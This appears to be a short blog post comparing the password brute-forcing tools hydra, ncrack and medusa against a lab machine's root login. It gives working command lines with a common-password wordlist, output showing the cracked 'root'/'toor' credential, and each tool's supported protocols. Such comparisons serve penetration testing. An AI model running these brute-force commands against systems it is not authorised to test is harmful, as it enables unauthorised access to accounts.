Brute force passwords with ncrack, hydra, and medusa

# hydra -l root -P 500-worst-passwords.txt ssh

[22][ssh] host: login: root password: toor
[STATUS] attack finished for (waiting for children to finish)


# ncrack -p 22 –user root -P 500-worst-passwords.txt

Discovered credentials for ssh on 22/tcp: 22/tcp ssh: ‘root’ ‘toor’


# medusa -u root -P 500-worst-passwords.txt -h -M ssh

ACCOUNT FOUND: [ssh] Host: User: root Password: toor [SUCCESS]

Problems with VM?

Error: Not an FTP protocol or service shutdown: 500 OOPS: priv_sock_get_cmd

medusaReceive returned no data

The answer is to use ncrack


Protocols supported include:

Hydra – TELNET, FTP, HTTP, HTTPS, HTTP-PROXY, SMB, SMBNT, MS-SQL, MYSQL, REXEC, irc, RSH, RLOGIN, CVS, SNMP, SMTP, SOCKS5, VNC, POP3, IMAP, NNTP, PCNFS, XMPP, ICQ, SAP/R3, LDAP2, LDAP3, Postgres, Teamspeak, Cisco auth, Cisco enable, AFP, Subversion/SVN, Firebird, LDAP2, Cisco AAA

Medusa – AFP, CVS, FTP, HTTP, IMAP, MS-SQL, MySQL, NetWare NCP, NNTP, PcAnywhere, POP3, PostgreSQL, REXEC, RLOGIN, RSH, SMBNT, SMTP-AUTH, SMTP-VRFY, SNMP, SSHv2, Subversion (SVN), Telnet, VMware Authentication Daemon (vmauthd), VNC, Generic Wrapper,
Web Form

Ncrack – RDP, SSH, http(s), SMB, pop3(s), VNC, FTP, telnet

While ncrack has limited protocol support compared to Hydra and Medusa the only conclusion for this little test; when it comes to speed, reliability and the ability to hit RDP services ncrack wins!!